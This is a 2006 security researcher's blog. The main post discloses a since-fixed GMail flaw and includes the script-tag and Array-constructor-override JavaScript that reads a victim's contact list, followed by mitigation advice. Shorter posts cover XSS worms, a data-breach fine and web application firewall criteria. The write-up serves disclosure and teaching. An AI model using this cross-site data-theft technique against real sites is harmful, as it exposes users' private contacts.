Friday, January 27, 2006

FTC drops the hammer on ChoicePoint

FTC imposes $10M fine against ChoicePoint for data breach
The breach resulted in the compromise of nearly 160,000 consumer records last year


JANUARY 26, 2006 (COMPUTERWORLD) - "The U.S. Federal Trade Commission (FTC) has imposed a $10 million civil penalty against data aggregator ChoicePoint Inc. for a massive data security breach that resulted in the compromise of nearly 160,000 consumer records last year"

Advanced Web Attack Techniques using GMail


A few months ago, I discovered a vulnerability in GMail where it became trivial to compromise someone's email contact list. I demonstrated the issue to a friend at Google by emailing his GMail account with simple link. Upon clicking the link and viewing the page, no XSS required, your contacts were displayed on screen (see screenshot). From there the email addresses could be easily stolen. Imagine if a spammer stumbled across this!

The issue was fixed within a few days, but the reason this particular vulnerability was interesting is the exploit techniques are a bit different than normally discussed. Also, I've been seeing the scenario described below increasingly often in websites. Those interested in browser security and AJAX development should take note.


Attack Details
Assumes some knowledge of Cross-Site Request Forgeries, but with a slight variation.

1) Email a GMail account a link and click.
example: http://foo/index.html


2) HTML of http://foo/index.html
The single line of HTML below forces the web browser to automatically send an off-domain HTTP request to GMail. If the victim is logged-in(obviously the case when you email a GMail account), the session cookies will be sent along with the request, and the response contains the contact list. The URL was predictable across all users.

Page URL: http://foo/index.html

<*script src="http://mail.google.com/mail/?_url_scrubbed_">

3) Sample content of http://mail.google.com/mail/?_url_scrubbed

The JavaScript line below contains an unreferenced array constant with your contact list of email addresses.

[["ct","Your Name","foo@gmail.com"], ["ct","Another Name","bar@gmail.com"] ]

GMail normally sends an XmlHttpRequest (XHR) to get this data on the fly where its then eval'ed in the browser and assigned to a variable. However in our case, the constant is loaded into JavaScript space on (http://foo/index.html) using a script tag, so its never assigned to a variable. This means accessing the data requires something more.


4) Accessing the contact list

When JavaScript parses and interprets the unreferenced array the Array constructor is called. Its possible to overwrite the internal Array constructor with our own to access the contact list. The new Array constructor uses a setters to trigger events, then parses out the data we want, and prints the data to screen.

var table = document.createElement('table');
table.id = 'content';
table.cellPadding = 3;
table.cellSpacing = 1;
table.border = 0;

function Array() {
var obj = this;
var ind = 0;
var getNext;
getNext = function(x) {
obj[ind++] setter = getNext;

if(x) {
var str = x.toString();
if ((str != 'ct') &&amp;amp;amp;amp; (typeof x != 'object') && (str.match(/@/))) {
var row = table.insertRow(-1);
var td = row.insertCell(-1);
td.innerHTML = str;
}
}
};
this[ind++] setter = getNext;
}

function readGMail() {
document.body.appendChild(table);
}


Moral of the Story
  • Don't put sensitive data in pure JavaScript files. Wrap HTML tags around the data to protect it from script tags.
  • If JavaScript files must contain sensitive information, make the URL unpredictable. And/Or...
  • Make sure the file cannot be accessed by anything with an off-domain referer.

Friday, January 20, 2006

More social networking sites hit with XSS Worms

After the MySpace (Samy Worm) we knew more of these were coming and still think its only the beginning. I've discussed the dangers of these issues in the past many times in my Phishing with Superbait presentation. At WhiteHat Security, we make= it our business to find these types of issues for our customers before the bad guys do.

Account Hijackings Force LiveJournal Changes
"It is impossible to know how many of these are nonfunctional, but we have an 85% success rate on usage, so it may be fair to state that 85% of those are valid," one member of Bantown told Security Fix. "However, we have only used approximately five hundred of these cookies so far, so it is impossible to tell whether this sample is statistically valid. Still, a massive number have been compromised."

"Group members said they plan to turn their attention to looking for similar flaws at another large social-networking site. "

Xanga Hit By Script Worm
"Following in the footsteps of fellow blog provider MySpace, Xanga.com appears to have been infected with some kind of worm that compromises the accounts of blog users and replaces content on the sites in order to replicate."

Sunday, January 15, 2006

The Best Blonde Joke Ever

Ok, normally I think blonde jokes are mostly dull and childish. But, this one has to be the absolute best blonde joke ever. No offense Llana, ...sweetie... sweetie?

Friday, January 13, 2006

WASC releases Web Application Firewall Evaluation Criteria

This is a very exciting project and its been a long time coming. Project Leader Ivan Ristic (ThinkingStone) has done an amazing job, as have the other contributors. Industry moving efforts such as these are only possible with the active involvement of the community.

WASC's mission is to promote understanding and awareness of web application security. With the WAFEC project, we are creating level playing field from which customers, industry analysts, and vendors can objectively evaluate the web application firewall market.

Consortium hopes to lift Web application firewall confusion

Official WASC Press Release

WAFEC Project Page

My TV interview with ABC News (AU)

In August of 2005 I was interviewed by ABC News (AU) reporter Quentin McDermott for a Four Corners episode (Your Money and Your Life). The experience was great! I got the chance to share what WhiteHat Security is doing and also demo'ed some funny/scary/serious XSS attacks on their website. I showed how its possible to fake a seemingly real news story on their website by linking the reporter to Al Qaeda. Quentin was both amazed and concerned, but he felt better about after I faked another story giving him the Pulitzer. A few weeks later I got a nice email from their security department asking where the vulnerability was so they could fix it. Several days later, problem solved.

All part of job. :)

Here is a shortened version of the 45min show. Enjoy.

Tuesday, January 10, 2006

Back from 2005-06 Maui Vacation

The family had a blast and we did a ton of stuff. Visited 30+ beaches, played paintball and football and ditch and shock tanks and video games, went on a cruise ship and dad's fishing boat, BBQ'ed, rode a quad through the pineapple fields to Jaws, openned X-Mas presents, visited with family/friends, jumped on a tramp, ate a lot, took family portraits. Not bad for a two week stay.













Big Maui Real Estate

For fun, Lex and I launched a Maui Real Estate website (BigMaui.com). Its a mashup using the Google Maps API, Yahoo Geocoding, and MLS Data. Lots of AJAXy type code. It even has an rss feed using feedburner to keep up with new listings.